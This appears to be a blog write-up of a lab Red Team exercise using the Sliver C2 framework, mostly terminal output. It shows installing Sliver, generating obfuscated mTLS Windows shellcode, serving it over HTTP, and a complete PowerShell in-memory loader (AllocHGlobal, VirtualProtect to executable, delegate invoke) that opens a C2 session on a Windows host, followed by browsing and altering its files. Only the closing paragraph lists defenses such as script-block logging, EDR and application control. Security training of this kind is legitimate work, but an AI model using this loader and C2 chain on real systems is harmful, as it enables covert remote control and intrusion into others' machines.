SLIVER C&C
SLIVER
apt update -y (Ensured all necessary tools and packages were up-to-date) as you can see below.┌──(root㉿kali)-[/home/luis]
└─# apt update -y
Des:1 http://kali.download/kali kali-rolling InRelease [34,0 kB]
Des:2 http://kali.download/kali kali-rolling/main amd64 Packages [21,0 MB]
Des:3 http://kali.download/kali kali-rolling/main amd64 Contents (deb) [50,6 MB]
Des:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [119 kB]
Des:5 http://kali.download/kali kali-rolling/contrib amd64 Contents (deb) [326 kB]
Des:6 http://kali.download/kali kali-rolling/non-free amd64 Packages [201 kB]
Des:7 http://kali.download/kali kali-rolling/non-free amd64 Contents (deb) [911 kB]
Des:8 http://kali.download/kali kali-rolling/non-free-firmware amd64 Packages [11,3 kB]
Des:9 http://kali.download/kali kali-rolling/non-free-firmware amd64 Contents (deb) [28,4 kB]
Descargados 73,3 MB en 16s (4.675 kB/s)
Se pueden actualizar 782 paquetes. Ejecute «apt list --upgradable» para verlos.
sudo apt install sliver -y (Installed the C2 framework and its cross-compilation dependencies, primarily mingw-w64.) as you can see below. ┌──(root㉿kali)-[/home/luis]
└─# sudo apt install sliver -y
Los paquetes indicados a continuación se instalaron de forma automática y ya no son necesarios.
kde-style-oxygen-qt6 libhdf4-0-alt libsframe1 libvpx9 python3-wheel-whl
libgdata-common liboxygenstyle6-6 libsigsegv2 linux-image-6.12.25-amd64
libgdata22 liboxygenstyleconfig6-6 libsoup-2.4-1 python3-packaging-whl
libgeos3.13.1 libqt5ct-common1.8 libsoup2.4-common python3-pyinstaller-hooks-contrib
Utilice «sudo apt autoremove» para eliminarlos.
Installing:
sliver
Installing dependencies:
binutils-mingw-w64 g++-mingw-w64-x86-64 gcc-mingw-w64-i686-posix-runtime
binutils-mingw-w64-ucrt64 g++-mingw-w64-x86-64-posix gcc-mingw-w64-x86-64
g++-mingw-w64 g++-mingw-w64-x86-64-win32 gcc-mingw-w64-x86-64-posix
g++-mingw-w64-i686 gcc-mingw-w64 gcc-mingw-w64-x86-64-posix-runtime
g++-mingw-w64-i686-posix gcc-mingw-w64-i686 mingw-w64
g++-mingw-w64-i686-win32 gcc-mingw-w64-i686-posix
Paquetes sugeridos:
gcc-14-locales
Summary:
Upgrading: 0, Installing: 18, Removing: 0, Not Upgrading: 782
Download size: 289 MB
Space needed: 910 MB / 39,5 GB available
Des:1 http://http.kali.org/kali kali-rolling/main amd64 binutils-mingw-w64-ucrt64 amd64 2.44-3+12+b1 [3.475 kB]
Des:2 http://http.kali.org/kali kali-rolling/main amd64 binutils-mingw-w64 all 2.43.1-5+12 [149 kB]
Des:3 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686-posix-runtime amd64 14.2.0-19+27+b1 [12,3 MB]
Des:12 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64 all 14.2.0-17+27 [193 kB]
Des:4 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686-posix amd64 14.2.0-19+27+b1 [37,2 MB]
Des:16 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64 all 14.2.0-17+27 [193 kB]
Des:5 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686-posix amd64 14.2.0-19+27+b1 [15,0 MB]
Des:6 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686-win32 amd64 14.2.0-19+27+b1 [15,0 MB]
Des:7 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-i686 all 14.2.0-17+27 [193 kB]
Des:8 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64-posix-runtime amd64 14.2.0-19+27+b1 [13,0 MB]
Des:9 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64-posix amd64 14.2.0-19+27+b1 [37,6 MB]
Des:10 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64-posix amd64 14.2.0-19+27+b1 [15,3 MB]
Des:11 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64-x86-64-win32 amd64 14.2.0-19+27+b1 [15,3 MB]
Des:13 http://http.kali.org/kali kali-rolling/main amd64 g++-mingw-w64 all 14.2.0-17+27 [193 kB]
Des:14 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-i686 all 14.2.0-17+27 [193 kB]
Des:15 http://http.kali.org/kali kali-rolling/main amd64 gcc-mingw-w64-x86-64 all 14.2.0-17+27 [193 kB]
Des:17 http://kali.download/kali kali-rolling/main amd64 mingw-w64 all 12.0.0-5 [11,3 kB]
Des:18 http://kali.download/kali kali-rolling/main amd64 sliver amd64 1.5.42-0kali1 [124 MB]
Descargados 289 MB en 9s (32,3 MB/s)
Seleccionando el paquete binutils-mingw-w64-ucrt64 previamente no seleccionado.
(Leyendo la base de datos ... 572169 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../00-binutils-mingw-w64-ucrt64_2.44-3+12+b1_amd64.deb ...
Desempaquetando binutils-mingw-w64-ucrt64 (2.44-3+12+b1) ...
Seleccionando el paquete binutils-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../01-binutils-mingw-w64_2.43.1-5+12_all.deb ...
Desempaquetando binutils-mingw-w64 (2.43.1-5+12) ...
Seleccionando el paquete gcc-mingw-w64-i686-posix-runtime previamente no seleccionado.
Preparando para desempaquetar .../02-gcc-mingw-w64-i686-posix-runtime_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-i686-posix-runtime (14.2.0-19+27+b1) ...
Seleccionando el paquete gcc-mingw-w64-i686-posix previamente no seleccionado.
Preparando para desempaquetar .../03-gcc-mingw-w64-i686-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686-posix previamente no seleccionado.
Preparando para desempaquetar .../04-g++-mingw-w64-i686-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686-win32 previamente no seleccionado.
Preparando para desempaquetar .../05-g++-mingw-w64-i686-win32_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-i686-win32 (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-i686 previamente no seleccionado.
Preparando para desempaquetar .../06-g++-mingw-w64-i686_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64-i686 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-x86-64-posix-runtime previamente no seleccionado.
Preparando para desempaquetar .../07-gcc-mingw-w64-x86-64-posix-runtime_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-x86-64-posix-runtime (14.2.0-19+27+b1) ...
Seleccionando el paquete gcc-mingw-w64-x86-64-posix previamente no seleccionado.
Preparando para desempaquetar .../08-gcc-mingw-w64-x86-64-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando gcc-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64-posix previamente no seleccionado.
Preparando para desempaquetar .../09-g++-mingw-w64-x86-64-posix_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64-win32 previamente no seleccionado.
Preparando para desempaquetar .../10-g++-mingw-w64-x86-64-win32_14.2.0-19+27+b1_amd64.deb ...
Desempaquetando g++-mingw-w64-x86-64-win32 (14.2.0-19+27+b1) ...
Seleccionando el paquete g++-mingw-w64-x86-64 previamente no seleccionado.
Preparando para desempaquetar .../11-g++-mingw-w64-x86-64_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64-x86-64 (14.2.0-17+27) ...
Seleccionando el paquete g++-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../12-g++-mingw-w64_14.2.0-17+27_all.deb ...
Desempaquetando g++-mingw-w64 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-i686 previamente no seleccionado.
Preparando para desempaquetar .../13-gcc-mingw-w64-i686_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64-i686 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64-x86-64 previamente no seleccionado.
Preparando para desempaquetar .../14-gcc-mingw-w64-x86-64_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64-x86-64 (14.2.0-17+27) ...
Seleccionando el paquete gcc-mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../15-gcc-mingw-w64_14.2.0-17+27_all.deb ...
Desempaquetando gcc-mingw-w64 (14.2.0-17+27) ...
Seleccionando el paquete mingw-w64 previamente no seleccionado.
Preparando para desempaquetar .../16-mingw-w64_12.0.0-5_all.deb ...
Desempaquetando mingw-w64 (12.0.0-5) ...
Seleccionando el paquete sliver previamente no seleccionado.
Preparando para desempaquetar .../17-sliver_1.5.42-0kali1_amd64.deb ...
Desempaquetando sliver (1.5.42-0kali1) ...
Configurando g++-mingw-w64-i686-win32 (14.2.0-19+27+b1) ...
update-alternatives: utilizando /usr/bin/i686-w64-mingw32-g++-win32 para proveer /usr/bin/i686-w64-mingw32-g++ (i686-w64-mingw
32-g++) en modo automático
Configurando g++-mingw-w64-x86-64-win32 (14.2.0-19+27+b1) ...
update-alternatives: utilizando /usr/bin/x86_64-w64-mingw32-g++-win32 para proveer /usr/bin/x86_64-w64-mingw32-g++ (x86_64-w64
-mingw32-g++) en modo automático
Configurando gcc-mingw-w64-x86-64-posix-runtime (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-i686-posix-runtime (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-x86-64 (14.2.0-17+27) ...
Configurando binutils-mingw-w64-ucrt64 (2.44-3+12+b1) ...
Configurando sliver (1.5.42-0kali1) ...
Configurando gcc-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Configurando g++-mingw-w64-x86-64-posix (14.2.0-19+27+b1) ...
Configurando gcc-mingw-w64-i686 (14.2.0-17+27) ...
Configurando g++-mingw-w64-x86-64 (14.2.0-17+27) ...
Configurando binutils-mingw-w64 (2.43.1-5+12) ...
Configurando gcc-mingw-w64 (14.2.0-17+27) ...
Configurando g++-mingw-w64-i686-posix (14.2.0-19+27+b1) ...
Configurando g++-mingw-w64-i686 (14.2.0-17+27) ...
Configurando g++-mingw-w64 (14.2.0-17+27) ...
Configurando mingw-w64 (12.0.0-5) ...
Procesando disparadores para libc-bin (2.41-12) ...
Procesando disparadores para man-db (2.13.1-1) ...
Procesando disparadores para kali-menu (2025.3.0) ...
Scanning processes...
Scanning linux images...
Running kernel seems to be up-to-date.
No services need to be restarted.
No containers need to be restarted.
No user sessions are running outdated binaries.
No VM guests are running outdated hypervisor (qemu) binaries on this host.
But before, we should know our IP Address which is 192.168.88.6 as you can see below:
┌──(luis㉿kali)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 08:00:27:4d:8a:0f brd ff:ff:ff:ff:ff:ff
inet 192.168.88.6/24 brd 192.168.88.255 scope global dynamic noprefixroute eth0
valid_lft 6987sec preferred_lft 6987sec
inet6 fd00::93ca:187e:41e3:abd6/64 scope global temporary dynamic
valid_lft 26sec preferred_lft 26sec
inet6 fd00::a00:27ff:fe4d:8a0f/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 26sec preferred_lft 26sec
inet6 fe80::a00:27ff:fe4d:8a0f/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:77:9b:cb:94 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
Now, we are going to deploying sliver server which we will be able to obtain shell.
┌──(root㉿kali)-[/home/luis]
└─# sliver-server
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain improvise
[*] Server v1.5.42 - kali
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
Now, we must create shellcode as you can see below with our ip and port where we will receive the shell.
[server] sliver > generate --mtls 192.168.88.6:443 --format shellcode
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 1m4s
[*] Encoding shellcode with shikata ga nai ... success!
[*] Implant saved to /home/luis/VIVID_LAPAROSCOPE.bin
Now, ls command confirm has been created to current directory as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ls
CVE-2025-32463_chwoot Escritorio hola microchoft.txt password Plantillas reverse_shell.php silver.txt text.php vulnyx_shop.txt
Descargas friendly.txt Imágenes Música password_bloodhound prueba.elf secretito.txt SMS-Bomber users1.txt Win7Blue
docker-compose.yml galeria.txt jamm.txt nc.exe passwords.txt Público secretito.zip spoofy Vídeos
Documentos hash LinkedInDumper ofuskeit.txt persistence.txt reverse.php sedition.txt ssh2john.py VIVID_LAPAROSCOPE.bin
Now, we have to change the name as you can see below with the next command:
- mv VIVID_LAPAROSCOPE.bin shellcode.bin
└─# mv VIVID_LAPAROSCOPE.bin shellcode.bin
Now, ls command confirm has been changed to current directory as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ls
CVE-2025-32463_chwoot Escritorio hola microchoft.txt password Plantillas reverse_shell.php shellcode.bin ssh2john.py vulnyx_shop.txt
Descargas friendly.txt Imágenes Música password_bloodhound prueba.elf secretito.txt silver.txt text.php Win7Blue
docker-compose.yml galeria.txt jamm.txt nc.exe passwords.txt Público secretito.zip SMS-Bomber users1.txt
Documentos hash LinkedInDumper ofuskeit.txt persistence.txt reverse.php sedition.txt spoofy Vídeos
shellcode.bin file, simulating the delivery of the malicious payload to the victim machine IP address 192.168.88.3.└─# python3 -m http.server 5000
Serving HTTP on 0.0.0.0 port 5000 (http://0.0.0.0:5000/) ...
192.168.88.3 - - [30/Sep/2025 18:41:31] "GET / HTTP/1.1" 200 -
192.168.88.3 - - [30/Sep/2025 18:41:31] code 404, message File not found
192.168.88.3 - - [30/Sep/2025 18:41:31] "GET /favicon.ico HTTP/1.1" 404 -
192.168.88.3 - - [30/Sep/2025 18:41:53] "GET /shellcode.bin HTTP/1.1" 200 -
[*] Starting mTLS listener ...
[*] Successfully started job #1
Please select a session or beacon via `use`
[server] sliver > mtls --lhost 192.168.88.6 --lport 443
[*] Starting mTLS listener ...
#Ruta del shellcode (ajústala si es necesario)
$sc =
[System.IO.File]::ReadAllBytes("C:\Users\Luis\Downloads\shellcode.bin")
# Reservar memoria
$ptr =
[System.Runtime.InteropServices.Marshal]::AllocHGlobal($sc.Length)
# Copiar shellcode a memoria
[System.Runtime.InteropServices.Marshal]::Copy($sc, 0, $ptr, $sc.Length)
# Cambiar permisos de memoria a ejecutable
$oldProtect = 0
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {
[DllImport("kernel32.dll")]
public static extern bool VirtualProtect(IntPtr lpAddress, UInt32
dwSize, UInt32 flNewProtect, out UInt32 lpflOldProtect);
}
"@ | Out-Null
[Kernel32]::VirtualProtect($ptr, $sc.Length, 0x40, [ref]$oldProtect) |
Out-Null
# Crear delegado para ejecutar shellcode
$actionType = [System.Action]
$delegate =
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
$ptr, $actionType)
# Ejecutar directamente (sin hilos)
$delegate.Invoke()
PS C:\Users\Luis\Desktop> C:\Users\Luis\Desktop\script.ps1
[*] Successfully started job #1[*] Session d372d112 VIVID_LAPAROSCOPE - 192.168.88.3:1315 (DESKTOP-Q2TNC4F) - windows/amd64 - Tue, 30 Sep 2025 18:46:20 CEST
ID Transport Remote Address Hostname Username Operating System Health
========== =========== =================== ================= ========== ================== =========
d372d112 mtls 192.168.88.3:1315 DESKTOP-Q2TNC4F Luis windows/amd64 [ALIVE]
[server] sliver > sessions -i d372d112
[*] Active session VIVID_LAPAROSCOPE (d372d112)
[*] Active session VIVID_LAPAROSCOPE (d372d112)
C:\Users\Luis\Desktop (35 items, 1.8 GiB)
=========================================
drwxrwxrwx acreditaciones máster de hacking ético <dir> Tue Mar 21 21:20:06 +0200 2023
drwxrwxrwx active directory <dir> Thu Jul 31 16:32:29 +0200 2025
drwxrwxrwx Azure_Courses <dir> Thu Mar 06 10:48:50 +0200 2025
drwxrwxrwx b1 Listening <dir> Tue Jan 28 18:31:19 +0200 2025
drwxrwxrwx B1PET <dir> Tue Apr 29 15:45:07 +0200 2025
drwxrwxrwx b1Trinity <dir> Mon May 05 16:24:08 +0200 2025
dr-xr-xr-x ceh <dir> Wed Jun 19 18:42:20 +0200 2024
drwxrwxrwx CEHv12 <dir> Tue Feb 25 19:17:08 +0200 2025
-rw-rw-rw- Configurador_FNMT_5.0.3_64bits.exe 43.8 MiB Wed Sep 24 19:31:04 +0200 2025
dr-xr-xr-x Curriculum vitae <dir> Sat Sep 27 09:53:23 +0200 2025
drwxrwxrwx curso python <dir> Sat May 24 11:55:17 +0200 2025
drwxrwxrwx cyberlabs <dir> Tue Sep 23 17:04:58 +0200 2025
-rw-rw-rw- desktop.ini 282 B Tue Jul 22 19:51:19 +0200 2025
-rw-rw-rw- DuckDuckGo.lnk 2.3 KiB Sun Apr 13 18:05:46 +0200 2025
-rw-rw-rw- Ethernet - Acceso directo (2).lnk 368 B Sun Feb 04 13:40:05 +0200 2024
-rw-rw-rw- Ethernet - Acceso directo.lnk 358 B Sun May 29 17:25:07 +0200 2022
-rw-rw-rw- Ethernet - Shortcut.lnk 358 B Sat Jan 20 13:03:17 +0200 2024
-rw-rw-rw- Ethernet 3 - Acceso directo.lnk 368 B Sun Feb 04 13:40:02 +0200 2024
drwxrwxrwx Examen Hacking 2ºEvaluación <dir> Tue Mar 21 12:05:59 +0200 2023
drwxrwxrwx Expert Ethical Hacking <dir> Tue Jan 28 18:34:25 +0200 2025
-rw-rw-rw- GUÍA TÉCNICA DE CADENA DE CUSTODIA DE EVIDENCIA DIGITAL.pdf 1.4 MiB Wed Apr 12 11:17:40 +0200 2023
drwxrwxrwx hacking <dir> Tue Sep 16 15:41:19 +0200 2025
drwxrwxrwx iCloud Photos <dir> Sun Jul 20 11:36:06 +0200 2025
-rw-rw-rw- iCloud Photos.zip 1006.8 MiB Sun Jul 20 11:26:49 +0200 2025
drwxrwxrwx ISOS <dir> Tue Sep 16 11:05:06 +0200 2025
drwxrwxrwx kinomakino_Courses <dir> Tue Sep 09 16:45:14 +0200 2025
-rw-rw-rw- metasploitable-linux-2.0.0.zip 825.0 MiB Thu Feb 29 11:40:12 +0200 2024
drwxrwxrwx Normativa <dir> Tue May 16 10:20:34 +0200 2023
drwxrwxrwx Python <dir> Fri Jan 26 12:13:47 +0200 2024
-rw-rw-rw- script.ps1 972 B Tue Sep 30 18:44:26 +0200 2025
drwxrwxrwx Scripts powershell <dir> Wed Dec 04 18:18:49 +0200 2024
drwxrwxrwx TRABAJO FIN CURSO <dir> Mon Dec 18 20:53:31 +0200 2023
-rw-rw-rw- vEthernet (Default Switch) - Acceso directo.lnk 390 B Sun Feb 04 13:40:06 +0200 2024
-rw-rw-rw- Wi-Fi - Acceso directo.lnk 398 B Sun May 29 17:25:05 +0200 2022
-rw-rw-rw- Zoom Workplace.lnk 1.9 KiB Sat Sep 27 11:05:55 +0200 2025
[server] sliver (VIVID_LAPAROSCOPE) > [server] sliver (VIVID_LAPAROSCOPE) > mkdir pepe
[*] C:\Users\Luis\Desktop\pepe
[server] sliver (VIVID_LAPAROSCOPE) > mkdir pepe
[*] C:\Users\Luis\Desktop\pepe
[server] sliver (VIVID_LAPAROSCOPE) > ls
C:\Users\Luis\Desktop (36 items, 1.8 GiB)
=========================================
drwxrwxrwx acreditaciones máster de hacking ético <dir> Tue Mar 21 21:20:06 +0200 2023
drwxrwxrwx active directory <dir> Thu Jul 31 16:32:29 +0200 2025
drwxrwxrwx Azure_Courses <dir> Thu Mar 06 10:48:50 +0200 2025
drwxrwxrwx b1 Listening <dir> Tue Jan 28 18:31:19 +0200 2025
drwxrwxrwx B1PET <dir> Tue Apr 29 15:45:07 +0200 2025
drwxrwxrwx b1Trinity <dir> Mon May 05 16:24:08 +0200 2025
dr-xr-xr-x ceh <dir> Wed Jun 19 18:42:20 +0200 2024
drwxrwxrwx CEHv12 <dir> Tue Feb 25 19:17:08 +0200 2025
-rw-rw-rw- Configurador_FNMT_5.0.3_64bits.exe 43.8 MiB Wed Sep 24 19:31:04 +0200 2025
dr-xr-xr-x Curriculum vitae <dir> Sat Sep 27 09:53:23 +0200 2025
drwxrwxrwx curso python <dir> Sat May 24 11:55:17 +0200 2025
drwxrwxrwx cyberlabs <dir> Tue Sep 23 17:04:58 +0200 2025
-rw-rw-rw- desktop.ini 282 B Tue Jul 22 19:51:19 +0200 2025
-rw-rw-rw- DuckDuckGo.lnk 2.3 KiB Sun Apr 13 18:05:46 +0200 2025
-rw-rw-rw- Ethernet - Acceso directo (2).lnk 368 B Sun Feb 04 13:40:05 +0200 2024
-rw-rw-rw- Ethernet - Acceso directo.lnk 358 B Sun May 29 17:25:07 +0200 2022
-rw-rw-rw- Ethernet - Shortcut.lnk 358 B Sat Jan 20 13:03:17 +0200 2024
-rw-rw-rw- Ethernet 3 - Acceso directo.lnk 368 B Sun Feb 04 13:40:02 +0200 2024
drwxrwxrwx Examen Hacking 2ºEvaluación <dir> Tue Mar 21 12:05:59 +0200 2023
drwxrwxrwx Expert Ethical Hacking <dir> Tue Jan 28 18:34:25 +0200 2025
-rw-rw-rw- GUÍA TÉCNICA DE CADENA DE CUSTODIA DE EVIDENCIA DIGITAL.pdf 1.4 MiB Wed Apr 12 11:17:40 +0200 2023
drwxrwxrwx hacking <dir> Tue Sep 16 15:41:19 +0200 2025
drwxrwxrwx iCloud Photos <dir> Sun Jul 20 11:36:06 +0200 2025
-rw-rw-rw- iCloud Photos.zip 1006.8 MiB Sun Jul 20 11:26:49 +0200 2025
drwxrwxrwx ISOS <dir> Tue Sep 16 11:05:06 +0200 2025
drwxrwxrwx kinomakino_Courses <dir> Tue Sep 09 16:45:14 +0200 2025
-rw-rw-rw- metasploitable-linux-2.0.0.zip 825.0 MiB Thu Feb 29 11:40:12 +0200 2024
drwxrwxrwx Normativa <dir> Tue May 16 10:20:34 +0200 2023
drwxrwxrwx pepe <dir> Tue Sep 30 18:51:36 +0200 2025
drwxrwxrwx Python <dir> Fri Jan 26 12:13:47 +0200 2024
-rw-rw-rw- script.ps1 972 B Tue Sep 30 18:44:26 +0200 2025
drwxrwxrwx Scripts powershell <dir> Wed Dec 04 18:18:49 +0200 2024
drwxrwxrwx TRABAJO FIN CURSO <dir> Mon Dec 18 20:53:31 +0200 2023
-rw-rw-rw- vEthernet (Default Switch) - Acceso directo.lnk 390 B Sun Feb 04 13:40:06 +0200 2024
-rw-rw-rw- Wi-Fi - Acceso directo.lnk 398 B Sun May 29 17:25:05 +0200 2022
-rw-rw-rw- Zoom Workplace.lnk 1.9 KiB Sat Sep 27 11:05:55 +0200 2025
This successful Red Team exercise highlights several areas where the target's defense could be improved:
- PowerShell Scripting: The use of PowerShell's in-memory execution is a powerful evasion technique. Security teams should implement PowerShell Logging (Module and Script Block Logging) to capture and analyze the malicious commands (
AllocHGlobal,VirtualProtect) used for injection. Network Traffic Detection: Although mTLS traffic is encrypted, defenders should monitor for Command and Control (C2) traffic patterns, such as unusually frequent or small-sized outgoing connections on port 443 that are characteristic of C2 beacons.
Endpoint Detection and Response (EDR): The most effective defense against this attack is a modern EDR solution that can detect API Hooking and suspicious memory allocation attempts (
VirtualProtectchanging memory permissions to executable) in real-time.Application Control: Implementing robust Application Whitelisting or Windows Defender Application Control (WDAC) could prevent unauthorized PowerShell scripts like
script.ps1from running in the first place.
Comments
Post a Comment